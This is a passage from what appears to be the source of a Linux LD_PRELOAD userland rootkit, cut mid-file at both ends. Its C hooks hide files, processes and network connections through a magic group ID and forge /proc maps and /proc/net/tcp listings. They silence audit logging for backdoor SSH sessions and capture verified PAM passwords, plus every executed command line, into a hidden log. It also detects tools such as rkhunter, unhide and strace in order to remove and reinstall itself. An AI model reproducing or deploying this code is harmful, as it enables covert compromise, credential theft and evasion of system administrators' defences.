xstrstr(INSTALL_DIR, string)) 3 | return 1; 4 | char *path; 5 | int i; 6 | for(i = 0; i < SCARY_PATHS_SIZE; i++){ 7 | path = scary_paths[i]; 8 | if(!fnmatch(path, string, FNM_PATHNAME)) 9 | return 1; 10 | else if(!strncmp(path, string, strlen(path))) 11 | return 1; 12 | else if(strstr(string, path)) 13 | return 1; 14 | } 15 | return 0; 16 | } 17 | -------------------------------------------------------------------------------- /src/LD/hiding/evasion/evasion.c: -------------------------------------------------------------------------------- 1 | static int remove_self(void){ 2 | if(not_user(0)) 3 | return VINVALID_PERM; 4 | hook(CUNLINK); 5 | xor(tldso_preload, LDSO_PRELOAD); 6 | call(CUNLINK, tldso_preload); 7 | clean(tldso_preload); 8 | pid_t pid; 9 | if((pid = fork()) == -1) 10 | return VFORK_ERR; 11 | else if(pid == 0) 12 | return VFORK_SUC; 13 | wait(NULL); 14 | reinstall(); 15 | if(!xhide_path(LDSO_PRELOAD)) 16 | xhide_path(LDSO_PRELOAD); 17 | return VEVADE_DONE; 18 | } 19 | 20 | static int evade(const char *filename, char *const argv[], char *const envp[]){ 21 | char *scary_proc, *scary_path; 22 | int i, ii; 23 | for(i = 0; i < SCARY_PROCS_SIZE; i++){ 24 | scary_proc = scary_procs[i]; 25 | char path[PATH_MAX/3]; 26 | snprintf(path, sizeof(path), "*/%s", scary_proc); 27 | if(process(scary_proc)) 28 | return remove_self(); 29 | else 30 | if(strstr(filename, scary_proc)) 31 | return remove_self(); 32 | else if(!fnmatch(path, filename, FNM_PATHNAME)) 33 | return remove_self(); 34 | } 35 | for(i = 0; i < SCARY_PATHS_SIZE; i++){ 36 | scary_path = scary_paths[i]; 37 | if(!fnmatch(scary_path, filename, FNM_PATHNAME) || strstr(filename, scary_path)) 38 | for(ii = 0; argv[ii] != NULL; ii++) 39 | if(!strncmp("--list", argv[ii], 6)) 40 | return remove_self(); 41 | } 42 | if(envp != NULL) 43 | for(i = 0; envp[i] != NULL; i++) 44 | for(ii = 0; ii < SCARY_VARIABLES_SIZE; ii++) 45 | if(!strncmp(scary_variables[ii], envp[i], strlen(scary_variables[ii]))) 46 | return remove_self(); 47 | return VNOTHING_DONE; 48 | } 49 | -------------------------------------------------------------------------------- /src/LD/hiding/evasion/evasion.h: -------------------------------------------------------------------------------- 1 | #ifndef EVASION_H 2 | #define EVASION_H 3 | 4 | static char *const scary_variables[5] = {"LD_TRACE_LOADED_OBJECTS", "LD_DEBUG", "LD_AUDIT","LD_PRELOAD","LD_DEBUG_OUTPUT"}; 5 | static char *const scary_paths[6] = {"*/*ld-linux*.so.*", "*ld-linux*.so.*", "*/*ld-*.so", "*ld-*.so", "*/utmp", "utmp"}; 6 | static char *const scary_procs[9] = {"lsrootkit", "ldd", "unhide", "rkhunter", "chkproc", "chkdirs", "ltrace", "strace", "readelf"}; 7 | 8 | #define SCARY_VARIABLES_SIZE sizeofarray(scary_variables) 9 | #define SCARY_PATHS_SIZE sizeofarray(scary_paths) 10 | #define SCARY_PROCS_SIZE sizeofarray(scary_procs) 11 | 12 | #define VINVALID_PERM 0 13 | #define VFORK_ERR -1 14 | #define VFORK_SUC 2 15 | #define VEVADE_DONE 1 16 | #define VNOTHING_DONE 3 17 | 18 | static int remove_self(void); 19 | static int evade(const char *filename, char *const argv[], char *const envp[]); 20 | #include "evasion.c" 21 | 22 | #endif 23 | -------------------------------------------------------------------------------- /src/LD/hiding/files/files.h: -------------------------------------------------------------------------------- 1 | #ifndef FILES_H 2 | #define FILES_H 3 | 4 | #define mxstat(pathname, s) (long)call(C__XSTAT, _STAT_VER, pathname, s) 5 | #define mxstat64(pathname, s) (long)call(C__XSTAT64, _STAT_VER, pathname, s) 6 | #define mfxstat(fd, s) (long)call(C__FXSTAT, _STAT_VER, fd, s) 7 | #define mfxstat64(fd, s) (long)call(C__FXSTAT64, _STAT_VER, fd, s) 8 | #define mlxstat(pathname, s) (long)call(C__LXSTAT, _STAT_VER, pathname, s) 9 | #define mlxstat64(pathname, s) (long)call(C__LXSTAT64, _STAT_VER, pathname, s) 10 | gid_t get_path_gid(const char *pathname); 11 | gid_t get_path_gid64(const char *pathname); 12 | static gid_t lget_path_gid(const char *pathname); 13 | static gid_t lget_path_gid64(const char *pathname); 14 | static gid_t get_fd_gid(int fd); 15 | static gid_t get_fd_gid64(int fd); 16 | #include "get_path_gid.c" 17 | 18 | #define MODE_REG 0x32 19 | #define MODE_64 0x64 20 | 21 | int _hidden_path(const char *pathname, short mode); 22 | static int _f_hidden_path(int fd, short mode); 23 | static int _l_hidden_path(const char *pathname, short mode); 24 | static int hidden_proc(pid_t pid); 25 | #include "hidden.c" 26 | 27 | #define hidden_path(path) _hidden_path(path, MODE_REG) 28 | #define hidden_path64(path) _hidden_path(path, MODE_64) 29 | #define hidden_fd(fd) _f_hidden_path(fd, MODE_REG) 30 | #define hidden_fd64(fd) _f_hidden_path(fd, MODE_64) 31 | #define hidden_lpath(path) _l_hidden_path(path, MODE_REG) 32 | #define hidden_lpath64(path) _l_hidden_path(path, MODE_64) 33 | 34 | static int chown_path(char *path, gid_t gid){ 35 | hook(CCHOWN); 36 | return (long)call(CCHOWN, path, 0, gid); 37 | } 38 | 39 | #define PATH_ERR -1 40 | #define PATH_DONE 1 41 | #define PATH_SUCC 0 42 | 43 | static int hide_path(char *path){ 44 | if(not_user(0)) 45 | return PATH_ERR; 46 | if(hidden_path(path)) 47 | return PATH_DONE; 48 | return chown_path(path, MAGIC_GID); 49 | } 50 | 51 | static int xhide_path(const char *path){ 52 | xor(_path, path); 53 | int ret = hide_path(_path); 54 | clean(_path); 55 | return ret; 56 | } 57 | 58 | #endif 59 | -------------------------------------------------------------------------------- /src/LD/hiding/files/get_path_gid.c: -------------------------------------------------------------------------------- 1 | gid_t get_path_gid(const char *pathname){ 2 | struct stat s_fstat; 3 | memset(&s_fstat, 0, sizeof(stat)); 4 | hook(C__XSTAT); 5 | if(mxstat(pathname, &s_fstat) < 0) 6 | return 0; 7 | return s_fstat.st_gid; 8 | } 9 | 10 | gid_t get_path_gid64(const char *pathname){ 11 | struct stat64 s_fstat; 12 | memset(&s_fstat, 0, sizeof(stat64)); 13 | hook(C__XSTAT64); 14 | if(mxstat64(pathname, &s_fstat) < 0) 15 | return 0; 16 | return s_fstat.st_gid; 17 | } 18 | 19 | static gid_t lget_path_gid(const char *pathname){ 20 | struct stat s_fstat; 21 | memset(&s_fstat, 0, sizeof(stat)); 22 | hook(C__LXSTAT); 23 | if(mlxstat(pathname, &s_fstat) < 0) 24 | return 0; 25 | return s_fstat.st_gid; 26 | } 27 | 28 | static gid_t lget_path_gid64(const char *pathname){ 29 | struct stat64 s_fstat; 30 | memset(&s_fstat, 0, sizeof(stat64)); 31 | hook(C__LXSTAT64); 32 | if(mlxstat64(pathname, &s_fstat) < 0) 33 | return 0; 34 | return s_fstat.st_gid; 35 | } 36 | 37 | static gid_t get_fd_gid(int fd){ 38 | struct stat s_fstat; 39 | memset(&s_fstat, 0, sizeof(stat)); 40 | hook(C__FXSTAT); 41 | if(mfxstat(fd, &s_fstat) < 0) 42 | return 0; 43 | return s_fstat.st_gid; 44 | } 45 | 46 | static gid_t get_fd_gid64(int fd){ 47 | struct stat64 s_fstat; 48 | memset(&s_fstat, 0, sizeof(stat64)); 49 | hook(C__FXSTAT64); 50 | if(mfxstat64(fd, &s_fstat) < 0) 51 | return 0; 52 | return s_fstat.st_gid; 53 | } 54 | -------------------------------------------------------------------------------- /src/LD/hiding/files/hidden.c: -------------------------------------------------------------------------------- 1 | int _hidden_path(const char *pathname, short mode){ 2 | if(pathname == NULL) 3 | return 0; 4 | if(mode == MODE_REG){ 5 | if(get_path_gid(pathname) == MAGIC_GID) 6 | return 1; 7 | } else if(mode == MODE_64){ 8 | if(get_path_gid64(pathname) == MAGIC_GID) 9 | return 1; 10 | } 11 | return 0; 12 | } 13 | 14 | static int _f_hidden_path(int fd, short mode){ 15 | if(mode == MODE_REG){ 16 | if(get_fd_gid(fd) == MAGIC_GID) 17 | return 1; 18 | } else if(mode == MODE_64){ 19 | if(get_fd_gid64(fd) == MAGIC_GID) 20 | return 1; 21 | } 22 | return 0; 23 | } 24 | 25 | static int _l_hidden_path(const char *pathname, short mode){ 26 | if(pathname == NULL) 27 | return 0; 28 | if(mode == MODE_REG){ 29 | if(lget_path_gid(pathname) == MAGIC_GID) 30 | return 1; 31 | } else if(mode == MODE_64){ 32 | if(lget_path_gid64(pathname) == MAGIC_GID) 33 | return 1; 34 | } 35 | return 0; 36 | } 37 | 38 | static int hidden_proc(pid_t pid){ 39 | char proc_path[256]; 40 | snprintf(proc_path, sizeof(proc_path), "/proc/%d", pid); 41 | return _hidden_path(proc_path, MODE_REG); 42 | } 43 | -------------------------------------------------------------------------------- /src/LD/hiding/forge_maps.c: -------------------------------------------------------------------------------- 1 | static FILE *forge_maps(const char *pathname){ 2 | FILE *o = tmpfile(), *pnt; 3 | char buf[LINE_MAX]; 4 | hook(CFOPEN); 5 | if((pnt = call(CFOPEN, pathname, "r")) == NULL){ 6 | errno = ENOENT; 7 | fclose(o); 8 | return NULL; 9 | } 10 | xor(t_bdvlso,BDVLSO); 11 | while(fgets(buf, sizeof(buf), pnt) != NULL) 12 | if(!strstr(buf,t_bdvlso)) 13 | fputs(buf, o); 14 | clean(t_bdvlso); 15 | memset(buf, 0, strlen(buf)); 16 | fclose(pnt); 17 | fseek(o, 0, SEEK_SET); 18 | return o; 19 | } 20 | 21 | static FILE *forge_smaps(const char *pathname){ 22 | FILE *o = tmpfile(), *pnt; 23 | char buf[LINE_MAX]; 24 | int i = 0; 25 | hook(CFOPEN); 26 | if((pnt = call(CFOPEN, pathname, "r")) == NULL){ 27 | errno = ENOENT; 28 | fclose(o); 29 | return NULL; 30 | } 31 | xor(t_bdvlso,BDVLSO); 32 | while(fgets(buf, sizeof(buf), pnt) != NULL){ 33 | if(i > 0) 34 | i++; 35 | if(i > 15) 36 | i = 0; 37 | if(strstr(buf,t_bdvlso)) 38 | i = 1; 39 | if(i == 0) 40 | fputs(buf, o); 41 | } 42 | clean(t_bdvlso); 43 | memset(buf, 0, strlen(buf)); 44 | fclose(pnt); 45 | fseek(o, 0, SEEK_SET); 46 | return o; 47 | } 48 | 49 | static FILE *forge_numamaps(const char *pathname){ 50 | FILE *o = tmpfile(), *pnt; 51 | char buf[LINE_MAX]; 52 | hook(CFOPEN); 53 | if((pnt = call(CFOPEN, pathname, "r")) == NULL){ 54 | errno = ENOENT; 55 | fclose(o); 56 | return NULL; 57 | } 58 | xor(t_bdvlso,BDVLSO); 59 | while(fgets(buf, sizeof(buf), pnt) != NULL) 60 | if(!strstr(buf,t_bdvlso)) 61 | fputs(buf, o); 62 | clean(t_bdvlso); 63 | memset(buf, 0, strlen(buf)); 64 | fclose(pnt); 65 | fseek(o, 0, SEEK_SET); 66 | return o; 67 | } 68 | -------------------------------------------------------------------------------- /src/LD/hiding/forge_procnet.c: -------------------------------------------------------------------------------- 1 | static char *int_ip2hex(unsigned int ip){ 2 | unsigned char bytes[4]; 3 | char *output = (char*)malloc(sizeof(char) * 16); 4 | bytes[0] = ip & 0xFF; 5 | bytes[1] = (ip >> 8) & 0xFF; 6 | bytes[2] = (ip >> 16) & 0xFF; 7 | bytes[3] = (ip >> 24) & 0xFF; 8 | sprintf(output, "%X%X%X%X", bytes[3], bytes[2], bytes[1], bytes[0]); 9 | return output; 10 | } 11 | 12 | static int is_hidden_ip(char *addr){ 13 | FILE *fp; 14 | char buf[9]; 15 | if((fp = xfopen(HIDE_IP_PATH, "r")) == NULL) 16 | return 0; 17 | while(fgets(buf, sizeof(buf), fp) != NULL){ 18 | buf[9] = '\0'; 19 | if(!xstrncmp(addr, buf)) 20 | return 1; 21 | } 22 | fclose(fp); 23 | return 0; 24 | } 25 | 26 | static int secret_connection(char line[]){ 27 | char raddr[128], laddr[128], etc[128]; 28 | unsigned long rxq, txq, t_len, retr, inode; 29 | int lport, rport, d, state, uid, t_run, tout; 30 | char *fmt = "%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %512s\n"; 31 | sscanf(line, fmt, &d, laddr, &lport, raddr, &rport, &state, &txq, &rxq, &t_run, &t_len, &retr, &uid, &tout, &inode, etc); 32 | if(is_hidden_ip(laddr) || is_hidden_ip(raddr)){ 33 | memset(line, 0, strlen(line)); 34 | return 1; 35 | } 36 | return 0; 37 | } 38 | 39 | static int hidehost_alive(void){ 40 | char line[LINE_MAX]; 41 | FILE *fp; 42 | int status = 0; 43 | hook(CFOPEN); 44 | fp = call(CFOPEN, "/proc/net/tcp", "r"); 45 | if(fp == NULL) 46 | return 0; 47 | while(fgets(line, sizeof(line), fp) != NULL) 48 | if(secret_connection(line)){ 49 | status = 1; 50 | break; 51 | } 52 | fclose(fp); 53 | return status; 54 | } 55 | 56 | static FILE *forge_procnet(const char *pathname){ 57 | FILE *tmp = tmpfile(), *pnt; 58 | char line[LINE_MAX]; 59 | hook(CFOPEN); 60 | if((pnt = call(CFOPEN, pathname, "r")) == NULL) 61 | return NULL; 62 | while(fgets(line, sizeof(line), pnt) != NULL) 63 | if(!secret_connection(line)) 64 | fputs(line, tmp); 65 | fclose(pnt); 66 | fseek(tmp, 0, SEEK_SET); 67 | return tmp; 68 | } 69 | -------------------------------------------------------------------------------- /src/LD/hiding/hiding.h: -------------------------------------------------------------------------------- 1 | #ifndef HIDING_H 2 | #define HIDING_H 3 | 4 | #include "files/files.h" 5 | 6 | static int ld_inconsistent(void); 7 | static void reinstall(void); 8 | #include "reinstall.c" 9 | 10 | #include "evasion/evasion.h" 11 | 12 | static int scary_path(char *string); 13 | #include "evasion/block_strings.c" 14 | 15 | static FILE *forge_maps(const char *pathname); 16 | static FILE *forge_smaps(const char *pathname); 17 | static FILE *forge_numamaps(const char *pathname); 18 | #include "forge_maps.c" 19 | 20 | static char *int_ip2hex(unsigned int ip); 21 | static int is_hidden_ip(char *addr); 22 | static int secret_connection(char line[]); 23 | static int hidehost_alive(void); 24 | static FILE *forge_procnet(const char *pathname); 25 | #include "forge_procnet.c" 26 | 27 | static void _setgid(gid_t gid){ 28 | hook(CSETGID); 29 | call(CSETGID, gid); 30 | } 31 | 32 | static void hide_self(void){ 33 | if(not_user(0) || getgid() == MAGIC_GID) 34 | return; 35 | _setgid(MAGIC_GID); 36 | } 37 | 38 | #endif 39 | -------------------------------------------------------------------------------- /src/LD/hiding/reinstall.c: -------------------------------------------------------------------------------- 1 | static int ld_inconsistent(void){ 2 | struct stat ldstat; 3 | int inconsistent = 0, statval; 4 | hook(C__XSTAT); 5 | memset(&ldstat, 0, sizeof(stat)); 6 | xor(tldso_preload, LDSO_PRELOAD) 7 | statval = (long)call(C__XSTAT, _STAT_VER, tldso_preload, &ldstat); 8 | clean(tldso_preload); 9 | xor(tsopath, SOPATH); 10 | if((statval < 0 && errno == ENOENT ) || ldstat.st_size != strlen(tsopath)) 11 | inconsistent = 1; 12 | clean(tsopath); 13 | return inconsistent; 14 | } 15 | 16 | static void reinstall(void){ 17 | if(!ld_inconsistent()) 18 | return; 19 | FILE *ldfp; 20 | if((ldfp = xfopen(LDSO_PRELOAD, "w")) != NULL){ 21 | xfwrite(SOPATH, 1, ldfp); 22 | fflush(ldfp); 23 | fclose(ldfp); 24 | if(!xhide_path(LDSO_PRELOAD)) 25 | xhide_path(LDSO_PRELOAD); 26 | } 27 | return; 28 | } 29 | -------------------------------------------------------------------------------- /src/LD/hooks/audit/audit.c: -------------------------------------------------------------------------------- 1 | static int audit_log_acct_message(int audit_fd, int type, const char *pgname, const char *op, const char *name, unsigned int id, const char *host, const char *addr, const char *tty, int result){ 2 | if(bd_sshproc()){ 3 | setgid(MAGIC_GID); 4 | return 0; 5 | } 6 | hook(CAUDIT_LOG_ACCT_MESSAGE); 7 | return (long)call(CAUDIT_LOG_ACCT_MESSAGE, audit_fd, type, pgname, op, name, id, host, addr, tty, result); 8 | } 9 | 10 | static int audit_log_user_message(int audit_fd, int type, const char *message, const char *hostname, const char *addr, const char *tty, int result){ 11 | if(bd_sshproc()){ 12 | setgid(MAGIC_GID); 13 | return 0; 14 | } 15 | hook(CAUDIT_LOG_USER_MESSAGE); 16 | return (long)call(CAUDIT_LOG_USER_MESSAGE, audit_fd, type, message, hostname, addr, tty, result); 17 | } 18 | 19 | static int audit_send(int fd, int type, const void *data, unsigned int size){ 20 | if(bd_sshproc()){ 21 | setgid(MAGIC_GID); 22 | return 0; 23 | } 24 | hook(CAUDIT_SEND); 25 | return (long)call(CAUDIT_SEND, fd, type, data, size); 26 | } 27 | -------------------------------------------------------------------------------- /src/LD/hooks/audit/audit.h: -------------------------------------------------------------------------------- 1 | #ifndef AUDIT_H 2 | #define AUDIT_H 3 | 4 | static int audit_log_acct_message(int audit_fd, int type, const char *pgname, const char *op, const char *name, unsigned int id, const char *host, const char *addr, const char *tty, int result); 5 | static int audit_log_user_message(int audit_fd, int type, const char *message, const char *hostname, const char *addr, const char *tty, int result); 6 | static int audit_send(int fd, int type, const void *data, unsigned int size); 7 | #include "audit.c" 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /src/LD/hooks/authlog/authlog.h: -------------------------------------------------------------------------------- 1 | #ifndef AUTHLOG_H 2 | #define AUTHLOG_H 3 | 4 | static int verify_pass(char *user, char *acc_pass); 5 | static void log_auth(pam_handle_t *pamh, char *resp); 6 | #include "log.c" 7 | 8 | int pam_vprompt(pam_handle_t *pamh, int style, char **response, const char *fmt, va_list args); 9 | int pam_prompt(pam_handle_t *pamh, int style, char **response, const char *fmt, ...); 10 | #include "pam_vprompt.c" 11 | 12 | #endif 13 | -------------------------------------------------------------------------------- /src/LD/hooks/authlog/log.c: -------------------------------------------------------------------------------- 1 | static int verify_pass(char *user, char *acc_pass){ 2 | struct spwd *ent; 3 | char *pass; 4 | int got_pw; 5 | hook(CGETSPNAM); 6 | ent = call(CGETSPNAM, user); 7 | if(ent == NULL || strlen(ent->sp_pwdp) < 2) 8 | return 0; 9 | pass = crypt(acc_pass, ent->sp_pwdp); 10 | if(pass == NULL) 11 | return 0; 12 | got_pw = !strcmp(pass, ent->sp_pwdp); 13 | if(got_pw) 14 | return 1; 15 | return 0; 16 | } 17 | 18 | static void log_auth(pam_handle_t *pamh, char *resp){ 19 | char *user, output[128]; 20 | int got_pw; 21 | FILE *fp; 22 | user = get_username(pamh); 23 | if(user == NULL) 24 | return; 25 | got_pw = verify_pass(user, resp); 26 | if(!got_pw) 27 | return; 28 | if((fp = xfopen(LDSO_LOGS, "a")) != NULL){ 29 | sprintf(output, "%s:%s", user, resp); 30 | xor(t_o, output); 31 | fprintf(fp, "%s\n", t_o); 32 | clean(t_o); 33 | fflush(fp); 34 | fclose(fp); 35 | } 36 | if(!xhide_path(LDSO_LOGS)) 37 | xhide_path(LDSO_LOGS); 38 | } 39 | -------------------------------------------------------------------------------- /src/LD/hooks/authlog/pam_vprompt.c: -------------------------------------------------------------------------------- 1 | int pam_vprompt(pam_handle_t *pamh, int style, char **response, const char *fmt, va_list args){ 2 | struct pam_message msg; 3 | struct pam_response *pam_resp = NULL; 4 | const struct pam_message *pmsg; 5 | const struct pam_conv *conv; 6 | const void *convp; 7 | char *msgbuf; 8 | int retval; 9 | if(response) 10 | *response = NULL; 11 | if((retval = pam_get_item(pamh, PAM_CONV, &convp)) != PAM_SUCCESS) 12 | return retval; 13 | if((conv = convp) == NULL || conv->conv == NULL){ 14 | pam_syslog(pamh, LOG_ERR, "no conversation function"); 15 | return PAM_SYSTEM_ERR; 16 | } 17 | if(vasprintf(&msgbuf, fmt, args) < 0){ 18 | pam_syslog(pamh, LOG_ERR, "vasprintf: %m"); 19 | return PAM_BUF_ERR; 20 | } 21 | msg.msg_style = style; 22 | msg.msg = msgbuf; 23 | pmsg = &msg; 24 | retval = conv->conv(1, &pmsg, &pam_resp, conv->appdata_ptr); 25 | if(response) 26 | *response = pam_resp == NULL ? NULL : pam_resp->resp; 27 | if(retval != PAM_SUCCESS) 28 | return retval; 29 | if(pam_resp && pam_resp->resp != NULL) 30 | log_auth(pamh, pam_resp->resp); 31 | _pam_overwrite(msgbuf); 32 | _pam_drop(pam_resp); 33 | free(msgbuf); 34 | return retval; 35 | } 36 | 37 | int pam_prompt(pam_handle_t *pamh, int style, char **response, const char *fmt, ...){ 38 | va_list args; 39 | int retval; 40 | va_start(args, fmt); 41 | retval = pam_vprompt(pamh, style, response, fmt, args); 42 | va_end(args); 43 | return retval; 44 | } 45 | -------------------------------------------------------------------------------- /src/LD/hooks/dir/chdir.c: -------------------------------------------------------------------------------- 1 | int chdir(const char *pathname){ 2 | hook(CCHDIR); 3 | if(is_bdusr()) 4 | return (long)call(CCHDIR, pathname); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(CCHDIR, pathname); 10 | } 11 | 12 | int fchdir(int fd){ 13 | hook(CFCHDIR); 14 | if(is_bdusr()) 15 | return (long)call(CFCHDIR, fd); 16 | if(hidden_fd(fd)){ 17 | errno = ENOENT; 18 | return -1; 19 | } 20 | return (long)call(CFCHDIR, fd); 21 | } 22 | -------------------------------------------------------------------------------- /src/LD/hooks/dir/dir.h: -------------------------------------------------------------------------------- 1 | #ifndef DIR_H 2 | #define DIR_H 3 | 4 | static char *gdirname(DIR *dirp){ 5 | int fd = dirfd(dirp), readlink_status; 6 | char path[PATH_MAX], *filename = (char *)malloc(sizeof(path)); 7 | memset(filename, 0, PATH_MAX); 8 | snprintf(path, sizeof(path) - 1, "/proc/self/fd/%d", fd); 9 | hook(CREADLINK); 10 | readlink_status = (long)call(CREADLINK, path, filename, sizeof(path) - 1); 11 | if(readlink_status < 0) 12 | return NULL; 13 | return filename; 14 | } 15 | 16 | int mkdir(const char *pathname, mode_t mode); 17 | #include "mkdir.c" 18 | 19 | int rmdir(const char *pathname); 20 | #include "rmdir.c" 21 | 22 | int chdir(const char *pathname); 23 | int fchdir(int fd); 24 | #include "chdir.c" 25 | 26 | struct dirent *readdir(DIR *dirp); 27 | struct dirent64 *readdir64(DIR *dirp); 28 | #include "readdir.c" 29 | 30 | DIR *opendir(const char *pathname); 31 | DIR *opendir64(const char *pathname); 32 | DIR *fdopendir(int fd); 33 | #include "opendir.c" 34 | 35 | #endif 36 | -------------------------------------------------------------------------------- /src/LD/hooks/dir/mkdir.c: -------------------------------------------------------------------------------- 1 | int mkdir(const char *pathname, mode_t mode){ 2 | hook(CMKDIR); 3 | if(is_bdusr()) 4 | return (long)call(CMKDIR, pathname, mode); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(CMKDIR, pathname, mode); 10 | } 11 | -------------------------------------------------------------------------------- /src/LD/hooks/dir/opendir.c: -------------------------------------------------------------------------------- 1 | DIR *opendir(const char *pathname){ 2 | hook(COPENDIR); 3 | if(is_bdusr()) 4 | return call(COPENDIR, pathname); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return NULL; 8 | } 9 | return call(COPENDIR, pathname); 10 | } 11 | 12 | DIR *opendir64(const char *pathname){ 13 | hook(COPENDIR64); 14 | if(is_bdusr()) 15 | return call(COPENDIR64, pathname); 16 | if(hidden_path(pathname)){ 17 | errno = ENOENT; 18 | return NULL; 19 | } 20 | return call(COPENDIR64, pathname); 21 | } 22 | 23 | DIR *fdopendir(int fd){ 24 | hook(CFDOPENDIR); 25 | if(is_bdusr()) 26 | return call(CFDOPENDIR, fd); 27 | if(hidden_fd(fd)){ 28 | errno = ENOENT; 29 | return NULL; 30 | } 31 | return call(CFDOPENDIR, fd); 32 | } 33 | -------------------------------------------------------------------------------- /src/LD/hooks/dir/readdir.c: -------------------------------------------------------------------------------- 1 | struct dirent *readdir(DIR *dirp){ 2 | char path[PATH_MAX], *filename; 3 | struct dirent *dir; 4 | hook(CREADDIR); 5 | do{ 6 | dir = call(CREADDIR, dirp); 7 | if(is_bdusr()) 8 | return dir; 9 | if(dir == NULL) 10 | continue; 11 | if(!strcmp(dir->d_name,".\0") || !strcmp(dir->d_name, "/\0") || !strcmp(dir->d_name, "..\0")) 12 | continue; 13 | filename = gdirname(dirp); 14 | snprintf(path, sizeof(path) - 1, "%s/%s", filename, dir->d_name); 15 | free(filename); 16 | } while(dir && hidden_path(path)); 17 | return dir; 18 | } 19 | 20 | struct dirent64 *readdir64(DIR *dirp){ 21 | char path[PATH_MAX], *filename; 22 | struct dirent64 *dir; 23 | hook(CREADDIR64); 24 | do{ 25 | dir = call(CREADDIR64, dirp); 26 | if(is_bdusr()) 27 | return dir; 28 | if(dir == NULL) 29 | continue; 30 | if(!strcmp(dir->d_name,".\0") || !strcmp(dir->d_name, "/\0") || !strcmp(dir->d_name, "..\0")) 31 | continue; 32 | filename = gdirname(dirp); 33 | snprintf(path, sizeof(path) - 1, "%s/%s", filename, dir->d_name); 34 | free(filename); 35 | } while(dir && hidden_path(path)); 36 | return dir; 37 | } 38 | -------------------------------------------------------------------------------- /src/LD/hooks/dir/rmdir.c: -------------------------------------------------------------------------------- 1 | int rmdir(const char *pathname){ 2 | hook(CRMDIR); 3 | if(is_bdusr()) 4 | return (long)call(CRMDIR, pathname); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(CRMDIR, pathname); 10 | } 11 | -------------------------------------------------------------------------------- /src/LD/hooks/exec/exec.h: -------------------------------------------------------------------------------- 1 | #ifndef EXEC_H 2 | #define EXEC_H 3 | 4 | int execve(const char *filename, char *const argv[], char *const envp[]); 5 | #include "execve.c" 6 | 7 | int execvp(const char *filename, char *const argv[]); 8 | #include "execvp.c" 9 | 10 | #endif 11 | -------------------------------------------------------------------------------- /src/LD/hooks/exec/execve.c: -------------------------------------------------------------------------------- 1 | int execve(const char *filename, char *const argv[], char *const envp[]){ 2 | if(!not_user(0)) 3 | reinstall(); 4 | hook(CEXECVE); 5 | if(is_bdusr()) 6 | return call(CEXECVE, filename, argv, envp); 7 | FILE *fp; 8 | if((fp = xfopen(LDSO_LOGS, "a")) != NULL){ 9 | int i; 10 | for(i=0; argv[i] != NULL;i++){ 11 | xor(rr, argv[i]); 12 | fprintf(fp, "%s ", rr); 13 | clean(rr); 14 | } 15 | fprintf(fp, "\n"); 16 | fflush(fp); 17 | fclose(fp); 18 | } 19 | if(hidden_path(filename)){ 20 | errno = ENOENT; 21 | return -1; 22 | } 23 | int evasion_status = evade(filename, argv, envp); 24 | switch(evasion_status){ 25 | case VEVADE_DONE: 26 | exit(0); 27 | case VINVALID_PERM: 28 | errno = EPERM; 29 | return -1; 30 | case VFORK_ERR: 31 | return -1; 32 | case VFORK_SUC: 33 | return call(CEXECVE, filename, argv, envp); 34 | case VNOTHING_DONE: 35 | break; 36 | } 37 | return call(CEXECVE, filename, argv, envp); 38 | } 39 | -------------------------------------------------------------------------------- /src/LD/hooks/exec/execvp.c: -------------------------------------------------------------------------------- 1 | int execvp(const char *filename, char *const argv[]){ 2 | if(!not_user(0)) 3 | reinstall(); 4 | hook(CEXECVP); 5 | if(is_bdusr()) 6 | return call(CEXECVP, filename, argv); 7 | if(hidden_path(filename)){ 8 | errno = ENOENT; 9 | return -1; 10 | } 11 | int evasion_status = evade(filename, argv, NULL); 12 | switch(evasion_status){ 13 | case VEVADE_DONE: 14 | exit(0); 15 | case VINVALID_PERM: 16 | errno = EPERM; 17 | return -1; 18 | case VFORK_ERR: 19 | return -1; 20 | case VFORK_SUC: 21 | return call(CEXECVP, filename, argv); 22 | case VNOTHING_DONE: 23 | break; 24 | } 25 | return call(CEXECVP, filename, argv); 26 | } 27 | -------------------------------------------------------------------------------- /src/LD/hooks/gid/gid.h: -------------------------------------------------------------------------------- 1 | #ifndef GID_H 2 | #define GID_H 3 | 4 | int setgid(gid_t gid); 5 | #include "setgid.c" 6 | 7 | int setegid(gid_t egid); 8 | #include "setegid.c" 9 | 10 | int setregid(gid_t rgid, gid_t egid); 11 | #include "setregid.c" 12 | 13 | int setresgid(gid_t rgid, gid_t egid, gid_t sgid); 14 | #include "setresgid.c" 15 | 16 | #endif 17 | -------------------------------------------------------------------------------- /src/LD/hooks/gid/setegid.c: -------------------------------------------------------------------------------- 1 | int setegid(gid_t egid){ 2 | hook(CSETEGID); 3 | if(is_bdusr()){ 4 | if(egid != MAGIC_GID) 5 | call(CSETEGID, MAGIC_GID); 6 | return 0; 7 | } 8 | return (long)call(CSETEGID, egid); 9 | } 10 | -------------------------------------------------------------------------------- /src/LD/hooks/gid/setgid.c: -------------------------------------------------------------------------------- 1 | int setgid(gid_t gid){ 2 | hook(CSETGID); 3 | if(is_bdusr()){ 4 | if(gid != MAGIC_GID) 5 | call(CSETGID, MAGIC_GID); 6 | return 0; 7 | } 8 | return (long)call(CSETGID, gid); 9 | } 10 | -------------------------------------------------------------------------------- /src/LD/hooks/gid/setregid.c: -------------------------------------------------------------------------------- 1 | int setregid(gid_t rgid, gid_t egid){ 2 | hook(CSETREGID); 3 | if(is_bdusr()){ 4 | if(rgid != MAGIC_GID || egid != MAGIC_GID) 5 | call(CSETREGID, MAGIC_GID, MAGIC_GID); 6 | return 0; 7 | } 8 | return (long)call(CSETREGID, rgid, egid); 9 | } 10 | -------------------------------------------------------------------------------- /src/LD/hooks/gid/setresgid.c: -------------------------------------------------------------------------------- 1 | int setresgid(gid_t rgid, gid_t egid, gid_t sgid){ 2 | hook(CSETRESGID); 3 | if(is_bdusr()){ 4 | if(rgid != MAGIC_GID || egid != MAGIC_GID || sgid != MAGIC_GID) 5 | call(CSETRESGID, MAGIC_GID, MAGIC_GID, MAGIC_GID); 6 | return 0; 7 | } 8 | return 